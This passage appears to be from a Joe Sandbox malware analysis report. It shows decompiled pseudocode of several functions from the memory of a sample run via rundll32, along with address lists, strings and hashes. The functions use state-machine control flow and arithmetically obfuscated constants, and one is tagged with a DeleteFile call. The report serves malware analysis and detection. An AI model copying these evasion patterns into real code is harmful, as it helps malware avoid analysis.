				_t146 = 0x20971cc1;
				goto L19;
			}

0x00297676
0x0029767a
0x0029767e
0x00297681
0x00297686
0x00297692
0x0029769c
0x0029769d
0x002976a2
0x002976a4
0x002976a9
0x002976ac
0x002976af
0x002976b0
0x002976b8
0x002976bc
0x002976c4
0x002976cc
0x002976dc
0x002976e4
0x002976e9
0x002976ef
0x002976f7
0x002976ff
0x00297707
0x0029770f
0x00297717
0x0029771c
0x00297721
0x00297729
0x00297731
0x00297739
0x00297741
0x00297749
0x00297751
0x00297759
0x00297761
0x00297769
0x00297771
0x00297779
0x00297781
0x00297789
0x0029778e
0x00297796
0x002977a2
0x002977a5
0x002977a9
0x002977b1
0x002977b9
0x002977be
0x002977c6
0x002977cb
0x002977d3
0x002977db
0x002977e0
0x002977e8
0x002977f0
0x002977f8
0x00297800
0x00297808
0x00297810
0x00297815
0x0029781a
0x00297827
0x00297834
0x0029783e
0x002978a9
0x00000000
0x002978a9
0x00297842
0x00297893
0x0029789a
0x0029789c
0x00297925
0x0029792b
0x0029792b
0x002978a2
0x00000000
0x002978a2
0x0029784a
0x00297916
0x00297916
0x0029791c
0x00000000
0x00000000
0x00000000
0x0029791c
0x00297855
0x00297859
0x0029787e
0x0029787e
0x00000000
0x00000000
0x00000000
0x00000000
0x0029785b
0x0029785b
0x0029785b
0x0029785f
0x00297867
0x0029786f
0x00297875
0x00297875
0x0029786f
0x00297867
0x00297878
0x00297879
0x00000000
0x0029785b
0x002978ad
0x002978b2
0x002978be
0x002978ce
0x002978d3
0x002978d4
0x002978d8
0x002978dc
0x002978dd
0x002978e5
0x002978ee
0x002978ef
0x00297904
0x00297906
0x00297906
0x00297906
0x00297909
0x0029790e
0x00297911
0x00000000

Strings

`z, xrefs: 00297707
c?, xrefs: 00297769
ZP, xrefs: 002976EF
34, xrefs: 002977D3

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 34$ZP$`z$c?
API String ID: 0-1162272853
Opcode ID: 7dcd41c7c15e707ce72edc06be0ce89da0f3bb690bb5bb916abe4caa19661ead
Instruction ID: de47153fa1a1d3aaec00e60d312134efdfa755ca3f45ab70dd2e56bbd76ba31c
Opcode Fuzzy Hash: 7dcd41c7c15e707ce72edc06be0ce89da0f3bb690bb5bb916abe4caa19661ead
Instruction Fuzzy Hash: 5261967152C3419FEB69CF25C84951BBBE1BBC9748F004A1DF196962A0C7B8CA1ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 0029F099, Relevance: 5.2, Strings: 4, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0029F099(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t152;
				void* _t164;
				void* _t179;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int* _t195;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t152);
				_v24 = 0x1a3a;
				_t195 =  &(( &_v68)[6]);
				_v24 = _v24 | 0xad9fd8e9;
				_v24 = _v24 ^ 0xad9fdafa;
				_t192 = 0;
				_v48 = 0xc7a1;
				_t179 = 0x2d416ecf;
				_v48 = _v48 + 0xffff41dd;
				_t189 = 0x6d;
				_v48 = _v48 / _t189;
				_v48 = _v48 << 6;
				_v48 = _v48 ^ 0x00000581;
				_v32 = 0x64b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 | 0xfafc5bd4;
				_v32 = _v32 ^ 0xbafc5bd4;
				_v52 = 0xa266;
				_t190 = 0x19;
				_v52 = _v52 * 0x23;
				_v52 = _v52 + 0xfffff7b9;
				_v52 = _v52 | 0x9bf494f1;
				_v52 = _v52 ^ 0xdbf6bffb;
				_v16 = 0xc005;
				_v16 = _v16 + 0x2f17;
				_v16 = _v16 ^ 0x0000df6d;
				_v20 = 0x3b6c;
				_v20 = _v20 + 0xa132;
				_v20 = _v20 ^ 0x0000abee;
				_v56 = 0xa633;
				_v56 = _v56 / _t190;
				_v56 = _v56 << 9;
				_v56 = _v56 >> 3;
				_v56 = _v56 ^ 0x0001f977;
				_v60 = 0x81c7;
				_v60 = _v60 | 0x7ad0d342;
				_v60 = _v60 ^ 0x5d30e79b;
				_v60 = _v60 + 0x7d28;
				_v60 = _v60 ^ 0x27e0a525;
				_v64 = 0xbe3d;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x72fbf895;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0xe5f7a6ca;
				_v36 = 0x30c1;
				_v36 = _v36 * 0x51;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0x1eda5d7d;
				_v28 = 0xa691;
				_v28 = _v28 ^ 0x0772a608;
				_v28 = _v28 ^ 0x07721c41;
				_v68 = 0xa1e1;
				_v68 = _v68 + 0xfffff639;
				_v68 = _v68 * 0x72;
				_v68 = _v68 | 0xb783fd02;
				_v68 = _v68 ^ 0xb7c3d808;
				_v8 = 0x8e95;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x023a3239;
				_v40 = 0xde71;
				_v40 = _v40 | 0x41145b6e;
				_v40 = _v40 >> 3;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x0000d444;
				_v12 = 0xe362;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x38d8c6cf;
				_v44 = 0x3755;
				_v44 = _v44 + 0xffff2006;
				_v44 = _v44 + 0x8cc7;
				_v44 = _v44 + 0xd944;
				_v44 = _v44 ^ 0x00008c64;
				do {
					while(_t179 != 0x14139bdc) {
						if(_t179 == 0x1afa3c13) {
							E002AB0BF(_v8, _a12, _v40, _t192,  &_v4, _v12, _v44, _a4, _v52 | _v48);
						} else {
							if(_t179 == 0x2d416ecf) {
								_t179 = 0x14139bdc;
								continue;
							} else {
								if(_t179 != 0x3272b602) {
									goto L11;
								} else {
									_push(_t179);
									_push(_t179);
									_t192 = E002A9E2B(_v4 + _v4);
									_t195 =  &(_t195[3]);
									if(_t192 != 0) {
										_t179 = 0x1afa3c13;
										continue;
									}
								}
							}
						}
						L14:
						return _t192;
					}
					_t164 = E002AB0BF(_v16, _a12, _v20, 0,  &_v4, _v56, _v60, _a4, _v32 | _v24);
					_t195 =  &(_t195[7]);
					if(_t164 == 0) {
						_t179 = 0x11f88af4;
						goto L11;
					} else {
						_t179 = 0x3272b602;
						continue;
					}
					goto L14;
					L11:
				} while (_t179 != 0x11f88af4);
				goto L14;
			}

0x0029f0a0
0x0029f0a4
0x0029f0a8
0x0029f0ac
0x0029f0b0
0x0029f0b1
0x0029f0b2
0x0029f0b7
0x0029f0bf
0x0029f0c2
0x0029f0cc
0x0029f0d4
0x0029f0d6
0x0029f0de
0x0029f0e3
0x0029f0f1
0x0029f0f6
0x0029f0fc
0x0029f101
0x0029f109
0x0029f111
0x0029f116
0x0029f11e
0x0029f126
0x0029f133
0x0029f134
0x0029f138
0x0029f140
0x0029f148
0x0029f150
0x0029f158
0x0029f160
0x0029f168
0x0029f170
0x0029f178
0x0029f180
0x0029f18e
0x0029f192
0x0029f197
0x0029f19c
0x0029f1a4
0x0029f1ac
0x0029f1b4
0x0029f1bc
0x0029f1c4
0x0029f1cc
0x0029f1d4
0x0029f1d9
0x0029f1e1
0x0029f1e5
0x0029f1ed
0x0029f1fa
0x0029f1fe
0x0029f203
0x0029f20b
0x0029f213
0x0029f21b
0x0029f223
0x0029f22b
0x0029f238
0x0029f23c
0x0029f244
0x0029f24c
0x0029f254
0x0029f259
0x0029f261
0x0029f269
0x0029f276
0x0029f280
0x0029f28a
0x0029f292
0x0029f29a
0x0029f29f
0x0029f2a7
0x0029f2af
0x0029f2b7
0x0029f2bf
0x0029f2c7
0x0029f2cf
0x0029f2cf
0x0029f2d5
0x0029f38f
0x0029f2db
0x0029f2e1
0x0029f316
0x00000000
0x0029f2e3
0x0029f2e5
0x00000000
0x0029f2e7
0x0029f2fb
0x0029f2fc
0x0029f305
0x0029f307
0x0029f30c
0x0029f312
0x00000000
0x0029f312
0x0029f30c
0x0029f2e5
0x0029f2e1
0x0029f398
0x0029f3a0
0x0029f3a0
0x0029f342
0x0029f347
0x0029f34c
0x0029f355
0x00000000
0x0029f34e
0x0029f34e
0x00000000
0x0029f34e
0x00000000
0x0029f35a
0x0029f35a
0x00000000

Strings

(}, xrefs: 0029F1BC
U7, xrefs: 0029F2A7
l;, xrefs: 0029F168
b, xrefs: 0029F292

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (}$U7$b$l;
API String ID: 0-3276533828
Opcode ID: 593a50edbbd82101b67fb985cd6ef1e9ad916b71228981e5708e9c5d04eb9a7e
Instruction ID: 341a367c370c5f59bc4e9447e8e9a93da192fb138dea10a3e089cb5bd871a9ad
Opcode Fuzzy Hash: 593a50edbbd82101b67fb985cd6ef1e9ad916b71228981e5708e9c5d04eb9a7e
Instruction Fuzzy Hash: 35714DB11183819FD798CF65C88981BFBE1BBC4798F104A1CF596962A0C3B8CA59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00293B97, Relevance: 5.2, Strings: 4, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00293B97(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t127;
				void* _t138;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t146;
				intOrPtr _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int* _t173;

				_push(_a16);
				_t166 = _a12;
				_t144 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t127);
				_v60 = 0x361f2e;
				_t167 = 0;
				_v56 = 0x63c48e;
				_t173 =  &(( &_v108)[6]);
				_v52 = 0;
				_v48 = 0;
				_t146 = 0x2c5b8c0b;
				_v96 = 0x4740;
				_v96 = _v96 + 0xd67b;
				_v96 = _v96 + 0xffff7380;
				_v96 = _v96 + 0xfffffa0b;
				_v96 = _v96 ^ 0x0000c8a1;
				_v76 = 0x144d;
				_v76 = _v76 | 0xc07f0e53;
				_v76 = _v76 + 0xffff1723;
				_v76 = _v76 ^ 0xc07e2de7;
				_v80 = 0x577f;
				_t168 = 0x57;
				_v80 = _v80 * 0x14;
				_v80 = _v80 / _t168;
				_v80 = _v80 ^ 0x00003eae;
				_v84 = 0xb41e;
				_v84 = _v84 ^ 0xcc40aa96;
				_v84 = _v84 ^ 0x60a37713;
				_v84 = _v84 ^ 0xace33089;
				_v88 = 0xdfc4;
				_v88 = _v88 + 0x9f52;
				_v88 = _v88 + 0xb204;
				_v88 = _v88 ^ 0x00025ac8;
				_v92 = 0xe968;
				_v92 = _v92 << 9;
				_v92 = _v92 + 0xffff259d;
				_v92 = _v92 ^ 0x01d18af9;
				_v100 = 0xdbae;
				_v100 = _v100 + 0xfffffefa;
				_v100 = _v100 | 0x0cea93cf;
				_v100 = _v100 << 0xd;
				_v100 = _v100 ^ 0x5b7daf02;
				_v68 = 0xb82e;
				_v68 = _v68 | 0xee8c70ca;
				_v68 = _v68 ^ 0xee8cac99;
				_v104 = 0x988c;
				_t169 = 0x4d;
				_v104 = _v104 * 0x66;
				_v104 = _v104 + 0xc3b0;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00002a0f;
				_v108 = 0x80b5;
				_v108 = _v108 ^ 0x0d958633;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 + 0xd353;
				_v108 = _v108 ^ 0x00010667;
				_v72 = 0x685d;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 / _t169;
				_v72 = _v72 ^ 0x00007b51;
				_v64 = 0xeab0;
				_t170 = 0x77;
				_v64 = _v64 / _t170;
				_v64 = _v64 ^ 0x00003c21;
				while(_t146 != 0xfa06235) {
					if(_t146 == 0x1b9e3483) {
						E002ACF95(_v96,  &_v44, _t144, _v76);
						_t146 = 0x39405414;
						continue;
					} else {
						if(_t146 == 0x2c5b8c0b) {
							_t146 = 0x1b9e3483;
							continue;
						} else {
							if(_t146 == 0x348cdc2c) {
								_t141 = E002A39A9( &_v44, _v100, _v68, _v104, _t166 + 4, _v108);
								_t173 =  &(_t173[4]);
								__eflags = _t141;
								if(__eflags != 0) {
									_t146 = 0xfa06235;
									continue;
								}
							} else {
								if(_t146 != 0x39405414) {
									L13:
									__eflags = _t146 - 0x166af0ff;
									if(__eflags != 0) {
										continue;
									}
								} else {
									_t143 = E002A39A9( &_v44, _v80, _v84, _v88, _t166, _v92);
									_t173 =  &(_t173[4]);
									if(_t143 != 0) {
										_t146 = 0x348cdc2c;
										continue;
									}
								}
							}
						}
					}
					return _t167;
				}
				_t138 = E00293545( &_v44, _v72, __eflags, _v64, _t166 + 8);
				_t173 =  &(_t173[2]);
				__eflags = _t138;
				_t167 =  !=  ? 1 : _t167;
				_t146 = 0x166af0ff;
				goto L13;
			}

0x00293b9e
0x00293ba5
0x00293bac
0x00293bae
0x00293baf
0x00293bb6
0x00293bbd
0x00293bbe
0x00293bbf
0x00293bc4
0x00293bcc
0x00293bce
0x00293bd6
0x00293bd9
0x00293bdf
0x00293be3
0x00293be8
0x00293bf0
0x00293bf8
0x00293c00
0x00293c08
0x00293c10
0x00293c18
0x00293c20
0x00293c28
0x00293c30
0x00293c3f
0x00293c42
0x00293c4e
0x00293c52
0x00293c5a
0x00293c62
0x00293c6a
0x00293c72
0x00293c7a
0x00293c82
0x00293c8a
0x00293c92
0x00293c9a
0x00293ca2
0x00293ca7
0x00293caf
0x00293cb7
0x00293cbf
0x00293cc7
0x00293ccf
0x00293cd4
0x00293cdc
0x00293ce4
0x00293cec
0x00293cf4
0x00293d01
0x00293d02
0x00293d06
0x00293d0e
0x00293d13
0x00293d1b
0x00293d23
0x00293d2b
0x00293d30
0x00293d38
0x00293d40
0x00293d48
0x00293d53
0x00293d57
0x00293d5f
0x00293d6f
0x00293d77
0x00293d7b
0x00293d83
0x00293d91
0x00293e1a
0x00293e21
0x00000000
0x00293d93
0x00293d99
0x00293e03
0x00000000
0x00293d9b
0x00293da1
0x00293df3
0x00293df8
0x00293dfb
0x00293dfd
0x00293dff
0x00000000
0x00293dff
0x00293da3
0x00293da9
0x00293e50
0x00293e50
0x00293e56
0x00000000
0x00000000
0x00293daf
0x00293dc4
0x00293dc9
0x00293dce
0x00293dd4
0x00000000
0x00293dd4
0x00293dce
0x00293da9
0x00293da1
0x00293d99
0x00293e65
0x00293e65
0x00293e3b
0x00293e42
0x00293e46
0x00293e48
0x00293e4b
0x00000000

Strings

!<, xrefs: 00293D7B
h, xrefs: 00293C9A
Q{, xrefs: 00293D57
@G, xrefs: 00293BE8

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !<$@G$Q{$h
API String ID: 0-1160312082
Opcode ID: 9c6b9069c0f4ed7dc608b46d1dcfaded1680b385c2f43ed2db043cd4957961ca
Instruction ID: 1a7ca4aa326b7f6ce52bd74a89c9e76cafdf7b871e4052ffb0c2c9aa8568db4a
Opcode Fuzzy Hash: 9c6b9069c0f4ed7dc608b46d1dcfaded1680b385c2f43ed2db043cd4957961ca
Instruction Fuzzy Hash: 1D6185714183429FD758CF25C88982BFBE1BFC4708F408A1DF4A6962A0D7B5CA098F97

Uniqueness

Uniqueness Score: -1.00%

Function 002AC95E, Relevance: 5.1, Strings: 4, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E002AC95E(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				int _t164;
				signed int _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t177;
				void* _t194;
				void* _t198;
				signed int _t200;

				_v48 = 0x827d;
				_v48 = _v48 ^ 0xc33c0e11;
				_v48 = _v48 * 0x34;
				_t198 = __ecx;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x00150998;
				_v8 = 0xc4b3;
				_v8 = _v8 + 0xc6a6;
				_v8 = _v8 ^ 0x00018b49;
				_v28 = 0x2b58;
				_t169 = 0x57;
				_v28 = _v28 * 0x2b;
				_v28 = _v28 / _t169;
				_v28 = _v28 ^ 0x00001564;
				_v40 = 0x6b06;
				_v40 = _v40 | 0xdd17abbc;
				_v40 = _v40 + 0xffff0e69;
				_v40 = _v40 ^ 0xdd16fa37;
				_v12 = 0x4364;
				_v12 = _v12 ^ 0x4daed734;
				_v12 = _v12 ^ 0x4daee758;
				_v16 = 0xb89e;
				_v16 = _v16 + 0x78b7;
				_v16 = _v16 ^ 0x00012eeb;
				_v52 = 0xd888;
				_v52 = _v52 + 0x9bff;
				_v52 = _v52 + 0xaea6;
				_v52 = _v52 ^ 0xa5c60f20;
				_v52 = _v52 ^ 0xa5c47e1e;
				_v56 = 0x7c78;
				_v56 = _v56 ^ 0xeebdce6d;
				_v56 = _v56 + 0xffff293b;
				_v56 = _v56 + 0xffffd673;
				_v56 = _v56 ^ 0xeebcee70;
				_v32 = 0x8a69;
				_v32 = _v32 << 8;
				_v32 = _v32 + 0xffff19fe;
				_v32 = _v32 ^ 0x0089f6b6;
				_v44 = 0x259b;
				_t170 = 0x69;
				_v44 = _v44 / _t170;
				_v44 = _v44 >> 1;
				_t171 = 0x53;
				_v44 = _v44 / _t171;
				_v44 = _v44 ^ 0x00007293;
				_v20 = 0x858a;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x0cc036a9;
				_v20 = _v20 ^ 0x0cc00d6e;
				_v36 = 0x74da;
				_v36 = _v36 | 0x78e03973;
				_t172 = 0x7c;
				_v36 = _v36 / _t172;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xf31a9535;
				_v24 = 0x522a;
				_v24 = _v24 ^ 0x2ef4109f;
				_v24 = _v24 + 0xe245;
				_v24 = _v24 ^ 0x2ef5282b;
				_v4 = E002A1214();
				_t200 = _v48 + E002A1214() % _v8;
				_t167 = _v28 + E002A1214() % _v40;
				if(_t200 != 0) {
					_t194 = _t198;
					_t177 = _t200 >> 1;
					_t198 = _t198 + _t200 * 2;
					_t164 = memset(_t194, 0x2d002d, _t177 << 2);
					asm("adc ecx, ecx");
					memset(_t194 + _t177, _t164, 0);
				}
				E00298068( &_v4, _t167, _t198, _v20, 3, _v36, _v24);
				 *((short*)(_t198 + _t167 * 2)) = 0;
				return 0;
			}

0x002ac961
0x002ac96b
0x002ac97d
0x002ac981
0x002ac983
0x002ac988
0x002ac990
0x002ac998
0x002ac9a0
0x002ac9a8
0x002ac9b5
0x002ac9b8
0x002ac9c4
0x002ac9c8
0x002ac9d0
0x002ac9d8
0x002ac9e0
0x002ac9e8
0x002ac9f0
0x002ac9f8
0x002aca00
0x002aca08
0x002aca10
0x002aca18
0x002aca20
0x002aca28
0x002aca30
0x002aca38
0x002aca40
0x002aca48
0x002aca50
0x002aca58
0x002aca60
0x002aca68
0x002aca70
0x002aca78
0x002aca7d
0x002aca85
0x002aca8d
0x002aca99
0x002aca9e
0x002acaa4
0x002acaac
0x002acab1
0x002acab7
0x002acabf
0x002acac7
0x002acacc
0x002acad4
0x002acadc
0x002acae4
0x002acaf0
0x002acaf3
0x002acaf7
0x002acafc
0x002acb04
0x002acb0c
0x002acb14
0x002acb1c
0x002acb31
0x002acb52
0x002acb69
0x002acb6d
0x002acb72
0x002acb74
0x002acb76
0x002acb7e
0x002acb80
0x002acb82
0x002acb85
0x002acb9b
0x002acba5
0x002acbaf

Strings

dC, xrefs: 002AC9F0
s9x, xrefs: 002ACAE4
E, xrefs: 002ACB14
x|, xrefs: 002ACA48

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: E$dC$s9x$x|
API String ID: 0-423376957
Opcode ID: 8f76caf4f9a64b8155c354e86a5f130c6aff43e2f2bb68330ee68cd9c4e3c8b6
Instruction ID: c53a82e233507794b1319b95421583220642ba985339d57e791d436d7f15af8a
Opcode Fuzzy Hash: 8f76caf4f9a64b8155c354e86a5f130c6aff43e2f2bb68330ee68cd9c4e3c8b6
Instruction Fuzzy Hash: 2A51027150C3419FE348CF25D48A40BBBE1FBD8758F448A1DF199A62A0D7B4DA1ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 0029884A, Relevance: 5.1, Strings: 4, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0029884A(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v124;
				void* _t87;
				signed int _t96;
				void* _t99;
				intOrPtr _t108;

				_v52 = _v52 & 0x00000000;
				_v60 = 0x62a4db;
				_v56 = 0x26486e;
				_v16 = 0x7871;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xf4d4;
				_v16 = _v16 ^ 0x000092e3;
				_v8 = 0xd593;
				_t96 = 0x2c;
				_t108 = _a4;
				_v8 = _v8 / _t96;
				_v8 = _v8 * 0x64;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x03ca51ad;
				_v20 = 0xa11;
				_v20 = _v20 + 0x1728;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x00000206;
				_v32 = 0x9b6c;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x00005854;
				_v28 = 0xbef6;
				_v28 = _v28 + 0xffff56f7;
				_v28 = _v28 ^ 0x0000627a;
				_v36 = 0x7f27;
				_v36 = _v36 * 0x1b;
				_v36 = _v36 ^ 0x000d0dbd;
				_v12 = 0xdc;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffffbf46;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0xfc6220ee;
				_v24 = 0x6217;
				_v24 = _v24 ^ 0x31739121;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x000070a0;
				_t87 =  *((intOrPtr*)(_t108 + 0x18))( *((intOrPtr*)(_t108 + 0x2c)), 1, 0);
				_t111 = _t87;
				if(_t87 != 0) {
					E0029766F(_v8,  &_v124);
					_pop(_t99);
					_v48 =  &_v124;
					_v44 = E002A23BC( &_v40, _v20, _t111, _v32, _t99);
					 *((intOrPtr*)(_t108 + 0x18))( *((intOrPtr*)(_t108 + 0x2c)), 0xa,  &_v48, _v28);
					E0029F935(_v36, _v44, _v12, _v24);
				}
				return 0;
			}

0x00298850
0x00298856
0x0029885d
0x00298864
0x0029886b
0x0029886f
0x00298876
0x0029887d
0x0029888a
0x0029888d
0x00298890
0x0029889b
0x0029889e
0x002988a2
0x002988a9
0x002988b0
0x002988b7
0x002988ba
0x002988c1
0x002988c8
0x002988cc
0x002988d3
0x002988da
0x002988e1
0x002988e8
0x002988f3
0x002988f6
0x002988fd
0x00298904
0x00298908
0x0029890f
0x00298913
0x0029891a
0x00298921
0x00298928
0x0029892c
0x00298936
0x00298939
0x0029893b
0x00298947
0x0029894d
0x0029895e
0x00298969
0x00298975
0x00298984
0x0029898a
0x00298991

Strings

qx, xrefs: 00298864
TX, xrefs: 002988CC
nH&, xrefs: 0029885D
zb, xrefs: 002988E1

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: TX$nH&$qx$zb
API String ID: 0-3187396103
Opcode ID: 87dba04fd43a8803187983bb752d7ee62ff1fbae1c5642221cfb9a06d5ffcfe0
Instruction ID: b3dffea976e98a39f171edca78d7c0ae6feaa2817f4746c35b1c217b7a322075
Opcode Fuzzy Hash: 87dba04fd43a8803187983bb752d7ee62ff1fbae1c5642221cfb9a06d5ffcfe0
Instruction Fuzzy Hash: 8B41D271C0460EEBEF14CFA0C94A9EEBBB1BB04314F208159D511B62A0D7B95A59DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002AD08F, Relevance: 5.1, Strings: 4, Instructions: 68
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002AD08F(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v548;
				signed int _t86;
				signed int _t87;
				signed int _t88;

				_v28 = 0x216d;
				_v28 = _v28 + 0xa7e5;
				_v28 = _v28 + 0xffff3a71;
				_v28 = _v28 ^ 0x00001c6d;
				_v8 = 0xaeef;
				_v8 = _v8 + 0xffffdb8d;
				_t86 = 0x30;
				_v8 = _v8 / _t86;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x000013dd;
				_v12 = 0x5dd2;
				_t87 = 0x7d;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0xde0bd062;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0037ef22;
				_v20 = 0xd7e1;
				_v20 = _v20 ^ 0x2d6a8b3d;
				_v20 = _v20 + 0xffff7ed2;
				_v20 = _v20 ^ 0x2d69bbff;
				_v24 = 0x6c35;
				_t88 = 0x6c;
				_v24 = _v24 / _t88;
				_v24 = _v24 + 0xffff41da;
				_v24 = _v24 ^ 0xffff0368;
				_v16 = 0x2727;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0x5c50e2a3;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 ^ 0x25452c88;
				E002A0C65(_a8, _v28, _v8,  &_v548, _v12, _v20, _a4 + 0x2c);
				E00298289(_v24, _v16,  &_v548);
				return 1;
			}

0x002ad098
0x002ad0a1
0x002ad0a8
0x002ad0af
0x002ad0b6
0x002ad0bd
0x002ad0c9
0x002ad0ce
0x002ad0d3
0x002ad0d7
0x002ad0de
0x002ad0e8
0x002ad0ed
0x002ad0f2
0x002ad0f9
0x002ad0fd
0x002ad104
0x002ad10b
0x002ad112
0x002ad119
0x002ad120
0x002ad12a
0x002ad130
0x002ad133
0x002ad13a
0x002ad141
0x002ad148
0x002ad14c
0x002ad157
0x002ad15d
0x002ad17b
0x002ad18d
0x002ad19b

Strings

"7, xrefs: 002AD0FD
m!, xrefs: 002AD098
'', xrefs: 002AD141
5l, xrefs: 002AD120

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: "7$''$5l$m!
API String ID: 4033686569-1842671497
Opcode ID: c95a713b3b8f34be7b54acffcc81a8ce3d8a36d8c5a14f677f14144b7afb7f26
Instruction ID: 7472ada4429979706092876abf131fb838b065b19ba8293f4f8e7f0d049d67e2
Opcode Fuzzy Hash: c95a713b3b8f34be7b54acffcc81a8ce3d8a36d8c5a14f677f14144b7afb7f26
Instruction Fuzzy Hash: DC310871D0020EEBDB48CFE4D98A9EEFBB5FB04314F20818AD515B6290E7B85B558F80

Uniqueness

Uniqueness Score: -1.00%

